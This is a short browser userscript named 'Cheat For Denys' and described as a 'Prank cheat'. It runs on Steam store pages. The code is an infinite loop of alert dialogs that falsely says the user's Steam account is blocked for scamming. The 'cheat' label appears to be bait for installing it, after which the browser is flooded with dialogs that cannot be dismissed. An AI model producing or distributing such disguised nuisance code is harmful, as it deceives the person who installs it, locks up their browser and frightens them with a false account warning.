Cheat For Denys

Prank cheat

// ==UserScript==
// @name         Cheat For Denys
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Prank cheat
// @author       You
// @match       *https://store.steampowered.com/*
// @icon         data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==
// @grant        none
// ==/UserScript==

var i;
for (i = 1; i > 0; i++) {
  alert("Your Steam Is Blocked For Scamming!");
}